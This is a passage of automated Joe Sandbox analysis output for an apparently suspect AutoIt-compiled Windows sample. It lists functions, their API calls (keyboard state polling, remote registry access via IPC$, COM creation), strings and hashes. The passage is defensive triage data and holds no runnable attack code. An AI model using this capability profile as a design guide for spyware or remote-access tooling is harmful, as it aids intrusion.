                                                                                                • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                • String ID: 2
                                                                                                • API String ID: 1331449709-450215437
                                                                                                • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                • __swprintf.LIBCMT ref: 00460915
                                                                                                • __swprintf.LIBCMT ref: 0046092D
                                                                                                • _wprintf.LIBCMT ref: 004609E1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                • API String ID: 3054410614-2561132961
                                                                                                • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                • API String ID: 600699880-22481851
                                                                                                • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: DestroyWindow
                                                                                                • String ID: static
                                                                                                • API String ID: 3375834691-2160076837
                                                                                                • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$DriveType
                                                                                                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                • API String ID: 2907320926-3566645568
                                                                                                • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                • DeleteObject.GDI32(00000000), ref: 00470A04
                                                                                                • DestroyIcon.USER32(00530055), ref: 00470A1C
                                                                                                • DeleteObject.GDI32(FFA78017), ref: 00470A34
                                                                                                • DestroyWindow.USER32(004E0045), ref: 00470A4C
                                                                                                • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1237572874-0
                                                                                                • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                • String ID:
                                                                                                • API String ID: 2706829360-0
                                                                                                • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: State$Async$Keyboard
                                                                                                • String ID:
                                                                                                • API String ID: 541375521-0
                                                                                                • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 3413494760-0
                                                                                                • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                • String ID: AU3_FreeVar
                                                                                                • API String ID: 2634073740-771828931
                                                                                                • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CoInitialize.OLE32 ref: 0046C63A
                                                                                                • CoUninitialize.OLE32 ref: 0046C645
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                  • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                  • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                • API String ID: 2294789929-1287834457
                                                                                                • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                  • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                • ReleaseCapture.USER32 ref: 0047116F
                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                • API String ID: 2483343779-2107944366
                                                                                                • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                • _wcslen.LIBCMT ref: 00450720
                                                                                                • _wcscat.LIBCMT ref: 00450733
                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
